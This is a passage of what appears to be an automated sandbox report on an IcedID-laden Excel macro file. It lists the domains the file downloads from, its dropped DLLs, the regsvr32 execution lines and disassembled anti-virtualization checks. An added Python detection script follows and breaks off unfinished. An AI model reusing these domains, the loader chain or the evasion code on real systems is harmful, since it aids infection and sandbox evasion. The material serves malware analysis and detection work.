        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MEGKE28WTTVJKEVVHZSJX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod.log.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://prod.tools.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443

        E-Banking Fraud:

        Yara detected IcedID
        Source: Yara match | File source: dump.pcap, type: PCAP
        Source: Yara match | File source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY

        System Summary:

        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0 | Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1 | Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_003C1678 NtQuerySystemInformation,RtlAllocateHeap
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_003C1810
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8FB41BF
        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View | Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: workbook.xml | Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
        Source: 4.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2088452556.0000000000190000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
        Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Vac.list07-20214862208.xlsm
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmp
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: Vac.list07-20214862208.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: Vac.list07-20214862208.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
        Source: Vac.list07-20214862208.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: Vac.list07-20214862208.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: lsdfik[1].fml.0.dr | Static PE information: real checksum: 0x1baf8 should be: 0x19d85

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Contains functionality to detect hardware virtualization (CPUID execution measurement)
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_003C1E50
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 00000000003C1E71 second address: 00000000003C1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 00000000003C1EAB second address: 00000000003C1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_003C2434 rdtsc
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_003C27BC GetAdaptersInfo,GetAdaptersInfo
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp | Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 143.204.91.74 187
        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.21.37.209 80
        Source: C:\Windows\System32\regsvr32.exe | Domain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exe | Domain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_003C22DC LookupAccountNameW

        Stealing of Sensitive Information:

        Yara detected IcedID
        Source: Yara match | File source: dump.pcap, type: PCAP
        Source: Yara match | File source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY

        Remote Access Functionality:

        Yara detected IcedID
        Source: Yara match | File source: dump.pcap, type: PCAP
        Source: Yara match | File source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Scripting1 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery211 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Account Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting1 | NTDS | System Owner/User Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol124 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery22 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 444731 | Sample: Vac.list07-20214862208.xlsm | Start date: 06/07/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures.

Process tree and per-process findings:

EXCEL.EXE (graph counters 53 and 26)
  Network:
    uppercilio.fun 172.67.146.88, TCP 49167 -> 80, CLOUDFLARENET US
    voopeople.fun 172.67.194.117, TCP 49166 -> 80, CLOUDFLARENET US
    thousandsyears.download 172.67.198.51, TCP 49165 -> 80, CLOUDFLARENET US
  Dropped files:
    C:\Users\user\XTOWN.dll (PE32+)
    C:\Users\user\AppData\Local\...\lsdfik[1].fml (PE32+)
  Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
  Child processes: regsvr32.exe, started three times

  regsvr32.exe (first instance)
    Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements

  regsvr32.exe (second instance, graph counter 4)
    Network:
      astrocycle.download 104.21.37.209, TCP 49169 -> 80, CLOUDFLARENET US
      dr49lng3n1n2s.cloudfront.net 143.204.91.74, TCP 49168 -> 443, AMAZON-02 US
      2 other IPs or domains

  regsvr32.exe (third instance): no separate findings in the graph
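The chain the graph draws (Excel fetching from three Cloudflare-fronted domains, writing a PE32+ payload under a .fml name into the browser cache and as C:\Users\user\XTOWN.dll, then spawning regsvr32.exe, which resolves astrocycle.download) maps onto a few host-level detections that do not depend on the domains staying constant. The following Python is an added example and not part of the Joe Sandbox report: it runs those rules over constructed Sysmon-style events modelled on the graph. The event field names, the Excel install path, the regsvr32 command line and the minimal MZ/PE header stub are assumptions of the example; the domains, dropped-file paths and process names are taken from the report.

```python
import re
import struct
from typing import Dict, Iterable, List

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe"}
# Domains taken from the report's Contacted Domains table.
REPORT_DOMAINS = {
    "uppercilio.fun", "voopeople.fun", "thousandsyears.download",
    "astrocycle.download",
}
# Exactly one path component directly below a profile, e.g. C:\Users\user\XTOWN.dll
USER_ROOT = re.compile(r"^c:\\users\\[^\\]+\\[^\\]+$", re.IGNORECASE)
PE_EXTENSIONS = {".dll", ".exe", ".sys", ".ocx", ".scr"}

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"  # assumed install path
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"

# Constructed minimal MZ/PE header: e_lfanew at offset 0x3C points to "PE\0\0" at 0x40.
PE_STUB = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def extension(path: str) -> str:
    name = basename(path)
    return "." + name.rsplit(".", 1)[-1] if "." in name else ""


def looks_like_pe(header: bytes) -> bool:
    """True for an MZ header whose e_lfanew points at a PE signature. The file
    extension is ignored, so a PE32+ saved as .fml or .jpg still matches."""
    if len(header) < 0x40 or header[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", header, 0x3C)[0]
    return header[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(events: Iterable[Dict]) -> List[str]:
    """Apply the rules to a stream of events and return one string per hit."""
    findings: List[str] = []
    for ev in events:
        kind = ev["event"]
        if kind == "ProcessCreate":
            parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
            if parent in OFFICE_IMAGES and child in LOLBINS:
                findings.append(f"office-spawns-lolbin: {parent} -> {child}")
            if child == "regsvr32.exe":
                for arg in ev["CommandLine"].split():
                    if USER_ROOT.match(arg.strip('"')):
                        findings.append(f"regsvr32-loads-user-root-dll: {arg}")
        elif kind == "FileCreate":
            path, ext = ev["TargetFilename"], extension(ev["TargetFilename"])
            if looks_like_pe(ev.get("header", b"")) and ext not in PE_EXTENSIONS:
                findings.append(f"pe-with-mismatched-extension: {path}")
            if (USER_ROOT.match(path) and ext in PE_EXTENSIONS
                    and basename(ev["Image"]) in OFFICE_IMAGES):
                findings.append(f"office-drops-pe-to-user-root: {path}")
        elif kind == "DnsQuery":
            if ev["QueryName"].lower() in REPORT_DOMAINS:
                findings.append(
                    f"report-domain-lookup: {basename(ev['Image'])} -> {ev['QueryName']}")
    return findings


# Constructed events modelled on the behaviour graph; not real telemetry.
SAMPLE_EVENTS = [
    {"event": "DnsQuery", "Image": EXCEL, "QueryName": "uppercilio.fun"},
    {"event": "FileCreate", "Image": EXCEL, "header": PE_STUB,
     "TargetFilename": r"C:\Users\user\AppData\Local\...\lsdfik[1].fml"},  # path as abbreviated in the report
    {"event": "FileCreate", "Image": EXCEL, "header": PE_STUB,
     "TargetFilename": r"C:\Users\user\XTOWN.dll"},
    {"event": "ProcessCreate", "ParentImage": EXCEL, "Image": REGSVR32,
     "CommandLine": r"regsvr32 C:\Users\user\XTOWN.dll"},  # assumed command line
    {"event": "DnsQuery", "Image": REGSVR32, "QueryName": "astrocycle.download"},
    {"event": "DnsQuery", "Image": REGSVR32, "QueryName": "aws.amazon.com"},  # high-reputation lookup, no hit
    {"event": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe", "Image": REGSVR32,
     "CommandLine": r"regsvr32 /s C:\Windows\System32\shell32.dll"},  # benign control, no hit
]

if __name__ == "__main__":
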